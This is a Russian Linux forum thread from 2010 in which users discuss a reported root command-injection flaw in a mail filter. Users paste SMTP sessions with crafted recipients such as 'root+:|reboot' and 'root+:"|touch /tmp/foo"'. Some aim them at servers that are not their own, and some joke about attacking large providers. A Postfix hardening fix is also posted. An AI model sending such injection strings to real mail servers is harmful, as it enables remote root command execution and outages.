решето

voltaren (19.03.2010 18:05:00)

Это не уязвимость... Это Бэкдор...

shaplov (19.03.2010 18:11:27)

ДЫРИЩЕ

HighwayStar (19.03.2010 18:15:30)

Всё равно не пользуюсь.

>Это не уязвимость... Это Бэкдор...

Правильнее сказать "недокументированная возможность".

> Всё равно не пользуюсь.

А какой у вас маил?)))

shaplov> Это не уязвимость... Это Бэкдор...

Однозначно бэкдор, интересно адреса, явки разработчиков известны.

по сравнению с IE просто фигня

bernd (19.03.2010 18:20:43)

Размечтались=)

вас его использовать никто не заставлял. вы получили его как есть со всеми вытекающими. вот купите поддержку платную, тогда и выкабенивайтесь перед публикой, а так грызите бублик и не булькайте.

bernd (19.03.2010 18:22:13)

> Например - "root+:poweroff".

О, спасибо, сделал на двух серверах:

root+:/usr/bin/apt-get update
root+:/usr/bin/apt-get upgrade

И уязвимость пропала.

Igron (19.03.2010 18:23:19)

херня. В правильно настроенном MTA такое не прокатит

JB (19.03.2010 18:23:43)

у кого-нибудь работает?

HighwayStar (19.03.2010 18:24:27)

Х--ссе..

> root+:/usr/bin/apt-get upgrade

не хочу тебя разочаровывать, но ты забыл ключик "-y" =)

JB (19.03.2010 18:26:39)

Восхитительно. Сейчас какой-нибудь спамер положит полмира.

thesis (19.03.2010 18:29:09)

Я уже пытаюсь. Начал с серверов яндекса и гугла - пока не вышло

ArtemZ (19.03.2010 18:30:47)

> вас его использовать никто не заставлял. вы получили его как есть со всеми вытекающими. вот купите поддержку платную, тогда и выкабенивайтесь перед публикой, а так грызите бублик и не булькайте.

Грызи бублик сам, я вообще не одмин и никокой маилсервер не юзаю.

И вообще мы тут шутим с БеЛуком, а ты вщемился в дискас. Какую-то поддержку платную предлагаешь купить. Тут тебе не рынок )))

При чем тут МТА? какой-нибудь сендмыл сто лет уже как дропает рутовские привелегии при старте.

Sun-ch (19.03.2010 18:32:53)

Досадно. А как хотелось армагеддона.

thesis (19.03.2010 18:33:53)

"Некоторые администраторы уже отметили наличие попыток эксплуатации данной уязвимости в логах, все ждут появление червя".

Sun-ch (19.03.2010 18:35:38)

Не работает

504 5.5.2 <root+:poweroff>: Recipient address rejected: need fully-qualified address

Как и было сказано выше - на нормально настроенном сервере работать не будет

вот это да. включу зелёную консоль и буду гордиться собой.

RedPossum (19.03.2010 18:37:31)

> При чем тут МТА? какой-нибудь сендмыл сто лет уже как дропает рутовские привелегии при старте.

при том, что письмо с кривым "rcpt to" вообще не должно попадать в очередь

Mar 19 19:12:28 razvitie63 postfix/smtpd[24730]: NOQUEUE: reject: RCPT from localhost.localdomain[127.0.0.1]: 550 5.1.1 <root+:|touch /tmp/test123>: Recipient address rejected: User unknown in virtual mailbox table; from=<artem@localhost> to=<root+:|touch /tmp/test123> proto=ESMTP helo=<razvitie63.ru>

JB (19.03.2010 18:38:41)

| поставить забыл :). Я его сознательно пропустил, чтобы тупые дети не хулиганили.

Sun-ch (19.03.2010 18:40:04)

Почитай как работает milter. Ошибка в плугине, и код выполняется в его контексте.

Sun-ch (19.03.2010 18:41:53)

Ни чего не изменилось

rctp to:root+:|poweroff 502 5.5.2 Error: command not recognized rcpt to:"root+:|poweroff" 504 5.5.2 <root+:|poweroff>: Recipient address rejected: need fully-qualified address

Тебе стоило обратить внимание на сообщение от сервера.

вот это эпично...

opensuse (19.03.2010 18:47:50)

>Например - "root+:poweroff". Когда же вы выучите немецкий? Halt, ублюдки, halt.

Неужто spamd под рутом работает?

sdio (19.03.2010 18:51:57)

$ nc localhost 25 220 ownthabox ESMTP Postfix (Ubuntu) mail from: me@me.com 250 2.1.0 Ok rcpt to: root+:"|touch /tmp/foo" 250 2.1.5 Ok

$ ls -la /tmp/foo -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

http://securitytracker.com/alerts/2010/Mar/1023691.html

Sun-ch (19.03.2010 18:52:09)

artemz@artemz-laptop:~$ telnet ***.ru 25 Trying *******... Connected to ******. Escape character is '^]'. 220 *********** ESMTP Sendmail 8.13.8/8.13.8; Fri, 19 Mar 2010 16:53:17 +0100 helo ddd.ru 250 server.wind-host.ru Hello, pleased to meet you mail from: mail@rambler.ru 250 2.1.0 mail@rambler.ru... Sender ok RCPT TO:<root+:|reboot> 250 2.1.5 <root+:|reboot>... Recipient ok DATA 354 Enter mail, end with "." on a line by itself sdasdasd . 250 2.0.0 o2JFrHlu008660 Message accepted for delivery

Connection closed by foreign host.

ОЛОЛОЛО!111

ArtemZ (19.03.2010 18:56:11)

Начало Армагедона?!

Boy_from_Jungle (19.03.2010 18:58:31)

[(19:52):artem@razvitie63:~ ] telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 razvitie63.ru ESMTP Postfix (Debian/GNU)
mail from: artem@localhost
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foobar123"
550 5.1.1 <root+:|touch /tmp/foobar123>: Recipient address rejected: User unknown in virtual mailbox table

[(19:53):artem@razvitie63:~ ] ls /tmp/foobar123
ls: невозможно получить доступ к /tmp/foobar123: Нет такого файла или каталога

и?

JB (19.03.2010 18:58:56)

[fjfalcon@desktop ~]$ telnet * 25
Trying 8.8.8.8...
Connected to google.com.
Escape character is '^]'.
220 google.com ESMTP Postfix (Debian/GNU)
MAIL FROM: fjfalcon@fjfalcon.ru
250 2.1.0 Ok
RCPT TO:<root+:|reboot>
450 4.2.0 <root+:|reboot>: Recipient address rejected: Greylisted, see http://postgrey.schweikert.ch/help/root+:|reboot.html


это нормально?

fjfalcon (19.03.2010 19:01:12)

[root@layer hikaru]# telnet 192.168.1.250 25
Trying 192.168.1.250...
Connected to 192.168.1.250.
Escape character is '^]'.
220 ****.ru ESMTP Postfix (Debian/GNU)
Helo mail.example.com
250 ****.ru
mail from: abc@abc.ru
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address

Неужто так трудно правильно настроить сервак?

Решето.

cetjs2 (19.03.2010 19:03:51)

Нет

Отруби грейлистинг и посмотри что получится

врубил apt-get upgrade, сча отключу грейлистинг и гляну ;)

fjfalcon (19.03.2010 19:07:14)

-x не ставьте хаскеры.

SatanClaus (19.03.2010 19:11:17)

я валяюсь с таких уязвимостей... за это в морду бить надо!

splinter (19.03.2010 19:13:20)

обычное дело для перловой программы чуть крупнее hello-world - обилие отладочных вставок, т.к. читать большинство перлового кода после второй страницы уже невозможно. так что это не бэкдор, а обычные пеловые костыли, случайно забытые строителями.

[fjfalcon@desktop ~]$ telnet google.com 25
Trying 8.8.8.8...
Connected to google.com.
Escape character is '^]'.
220 google.com ESMTP Postfix (Debian/GNU)
mail from: me@me.ru
250 2.1.0 Ok
rcpt-to: root+:"|touch /tmp/foo"
221 2.7.0 Error: I can break rules, too. Goodbye.
Connection closed by foreign host.


после apt-get upgrade ;)

fjfalcon (19.03.2010 19:31:52)

В свете вышеизложенного вопрос. как скоро ляжет ЛОР ? Отправьте им уже "письмо счастья"

abumbaher (19.03.2010 19:45:16)

Блестяще. Я замер в восторге, ручки зачесались. Напомнило мне сендмыловское WIZ. Школота конечно не помнит...

Ололо. Еще один эксперт не писавший на преле программ сложнее указанного hello world.

ох блин.. ну и решето..

isden (19.03.2010 19:53:00)

У меня нигде не сработало :(

лол
решение

 smtpd_recipient_restriction =
...
        reject_non_fqdn_recipient,
        reject_unknown_recipient_domain,
        reject_unverified_recipient,
...

Да уж, мне стоит быть внимательнее-) Хотя настроение ты мне поднял.

А я то думаю чего у меня нифига не получается...